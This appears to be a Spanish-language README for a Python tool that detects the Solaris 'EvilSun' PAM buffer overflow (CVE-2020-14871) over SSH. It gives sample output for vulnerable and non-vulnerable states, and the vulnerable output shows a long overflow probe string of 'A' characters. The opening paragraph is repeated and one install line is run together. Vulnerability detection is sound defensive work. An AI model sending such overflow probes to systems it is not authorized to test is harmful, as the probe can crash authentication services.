
Este es un pequeño script de Python para detectar la vulnerabilidad "EvilSun" (CVE-2020-14871) en sistemas Solaris. La vulnerabilidad es un desbordamiento de búfer en el Pluggable Authentication Module (PAM) `pam_unix_auth` al manejar la autenticación interactiva por teclado en SSH.
Este es un pequeño script en Python para detectar la vulnerabilidad "EvilSun" (CVE-2020-14871) en sistemas Solaris. La vulnerabilidad es un desbordamiento de búfer en el Módulo de Autenticación Enchufable (PAM) pam_unix_auth al manejar la autenticación interactiva por teclado en SSH. Una explotación exitosa podría potencialmente conducir a la ejecución remota de código o a una denegación de servicio.
paramikopip3 install -r requirements.txt
Cuando /etc/ssh/sshd_config ha sido configurado con PAMAuthenticationViaKBDInt 'yes', puedes esperar la siguiente salida que indica un estado vulnerable:
[*] Connecting to hostname 192.168.100.12 port: 22
[*] Using payload: ['AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA']
[*] Authentication failed: Authentication failed: transport shut down or saw EOF
[-] !!!!!!! VULNERABLE !!!!!!!
Cuando /etc/ssh/sshd_config ha sido configurado con PAMAuthenticationViaKBDIn 'no', puedes esperar la siguiente salida que indica un estado no vulnerable (al menos para Sun SSHd):
[*] Connecting to hostname 192.168.100.12 port: 22
[*] Authentication failed: Authentication failed.
Actualmente sin probar.